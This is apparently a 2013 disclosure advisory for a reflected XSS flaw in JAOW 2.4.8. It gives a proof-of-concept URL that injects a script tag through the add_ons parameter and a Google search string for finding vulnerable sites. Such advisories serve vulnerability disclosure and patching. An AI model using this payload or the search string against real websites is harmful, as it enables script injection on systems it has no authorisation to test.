JAOW 2.4.8 XSS Vulnerability

###########################################
#
# Script Name : JAOW 2.4.8
#
# Version : 2.4.8
#
# Bug Type : XSS vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 23/03/2013
#
# Download app : http://www.jaow.net/uploads/jaow_2.4.8.zip
#
# Google search :  Propuls par Jaow 2.4.8 - 
#
###########################################

PoC :

http://[target]/[path]/add_ons.php?add_ons=[Xss]

Example :

http://[target]/[path]/add_ons.php?add_ons=1"><script>alert(31337);</script>

local Example :

http://localhost/demo/add_ons.php?add_ons=1"><script>alert(31337);</script>

//The information contained within this publication is





//supplied "as-is"with no warranties or guarantees of fitness





//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts





//responsibility for any damage caused by the use or misuse of





//this information